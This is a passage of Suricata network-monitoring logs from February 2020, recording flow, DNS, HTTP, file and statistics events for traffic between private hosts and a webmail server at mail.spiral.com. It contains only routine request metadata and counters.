d_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18184,"memcap_state":0,"memcap_global":0},"http":{"memuse":37205,"memcap":0}}} {"timestamp":"2020-02-29T00:01:45.001653+0000","flow_id":452932915956904,"event_type":"flow","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1180,"bytes_toclient":709,"start":"2020-02-29T00:00:16.593064+0000","end":"2020-02-29T00:00:44.595345+0000","age":28,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:46.933558+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57196,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.039247+0000","flow_id":448856997904054,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56014,"proto":"UDP","dns":{"type":"answer","id":57196,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:47.144742+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52259,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23414,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:47.250009+0000","flow_id":1377287193441638,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52259,"proto":"UDP","dns":{"type":"answer","id":23414,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:01:50.000629+0000","flow_id":1256757506654995,"event_type":"flow","src_ip":"192.168.10.122","src_port":60917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:48.967443+0000","end":"2020-02-28T23:56:49.075802+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:01:52.000199+0000","event_type":"stats","stats":{"uptime":13764,"capture":{"kernel_packets":132330,"kernel_drops":0},"decoder":{"pkts":132361,"bytes":91905859,"invalid":178,"ipv4":130938,"ipv6":8,"ethernet":132361,"raw":0,"null":0,"sll":0,"tcp":125966,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2640,"new_pruned":15,"est_pruned":2232,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18515,"memcap_state":0,"memcap_global":0},"http":{"memuse":37125,"memcap":0}}} 
{"timestamp":"2020-02-29T00:01:52.001029+0000","flow_id":2118594249540551,"event_type":"flow","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":16,"bytes_toserver":2706,"bytes_toclient":11394,"start":"2020-02-29T00:00:42.377799+0000","end":"2020-02-29T00:00:51.314644+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:55.000643+0000","flow_id":2239244160873526,"event_type":"flow","src_ip":"192.168.10.122","src_port":46652,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:56:54.144438+0000","end":"2020-02-28T23:56:54.252490+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:58.221235+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49258,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:01:58.332439+0000","flow_id":2074880077357107,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56903,"proto":"UDP","dns":{"type":"answer","id":49258,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:01:58.479290+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611}} {"timestamp":"2020-02-29T00:01:59.000177+0000","event_type":"stats","stats":{"uptime":13771,"capture":{"kernel_packets":132364,"kernel_drops":0},"decoder":{"pkts":132366,"bytes":91906141,"invalid":178,"ipv4":130941,"ipv6":8,"ethernet":132366,"raw":0,"null":0,"sll":0,"tcp":125969,"udp":4780,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2662,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2678,"synack":2669,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":136,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1709,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2179,"failed_udp":106},"tx":{"http":4436,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2255}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_prun
ed":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18514,"memcap_state":0,"memcap_global":0},"http":{"memuse":122658,"memcap":0}}} {"timestamp":"2020-02-29T00:02:01.583898+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41614,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59173,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.605340+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7611},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":39619,"tx_id":0}} {"timestamp":"2020-02-29T00:02:01.614287+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46582,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:01.695422+0000","flow_id":1385872834029786,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41614,"proto":"UDP","dns":{"type":"answer","id":59173,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:01.726419+0000","flow_id":1373619292299151,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34201,"proto":"UDP","dns":{"type":"answer","id":46582,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:01.772272+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:02:01.809666+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like 
Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785}} {"timestamp":"2020-02-29T00:02:02.054004+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:02:02.063370+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56001,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61179,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:02.174799+0000","flow_id":2245411754145674,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56001,"proto":"UDP","dns":{"type":"answer","id":61179,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908}} {"timestamp":"2020-02-29T00:02:02.260450+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52652,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":2}} {"timestamp":"2020-02-29T00:02:04.735204+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34698,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8785},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":35363,"tx_id":0}} {"timestamp":"2020-02-29T00:02:04.750794+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2110,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:04.861699+0000","flow_id":1667395055547594,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59842,"proto":"UDP","dns":{"type":"answer","id":2110,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:04.970705+0000","flow_id":1857713646178395,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=eu7ipj_hNihBGhyVt8Xmy50&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:02:04.979571+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:02:05.090880+0000","flow_id":69813250355827,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45990,"proto":"UDP","dns":{"type":"answer","id":26867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:02:06.000378+0000","event_type":"stats","stats":{"uptime":13778,"capture":{"kernel_packets":132438,"kernel_drops":0},"decoder":{"pkts":132444,"bytes":91945109,"invalid":179,"ipv4":131019,"ipv6":8,"ethernet":132444,"raw":0,"null":0,"sll":0,"tcp":126035,"udp":4791,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2233,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42780,"memcap":0}}} 
{"timestamp":"2020-02-29T00:02:07.265389+0000","flow_id":1007666603637629,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52652,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":908},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":2}} {"timestamp":"2020-02-29T00:02:10.000572+0000","flow_id":915689860042098,"event_type":"flow","src_ip":"192.168.10.122","src_port":50356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:57:09.200050+0000","end":"2020-02-28T23:57:09.311909+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:02:11.927835+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52256,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58265,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:02:12.039358+0000","flow_id":1646985371396187,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52256,"proto":"UDP","dns":{"type":"answer","id":58265,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361}} {"timestamp":"2020-02-29T00:02:12.119966+0000","flow_id":1408258204220712,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":361},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} 
{"timestamp":"2020-02-29T00:02:13.000227+0000","event_type":"stats","stats":{"uptime":13785,"capture":{"kernel_packets":132458,"kernel_drops":0},"decoder":{"pkts":132459,"bytes":91954648,"invalid":179,"ipv4":131034,"ipv6":8,"ethernet":132459,"raw":0,"null":0,"sll":0,"tcp":126049,"udp":4792,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2664,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2680,"synack":2671,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":137,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1711,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2185,"failed_udp":106},"tx":{"http":4441,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2261}},"flow_mgr":{"closed_pruned":2641,"new_pruned":15,"est_pruned":2234,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20167,"memcap_state":0,"memcap_global":0},"http":{"memuse":42773,"memcap":0}}} 
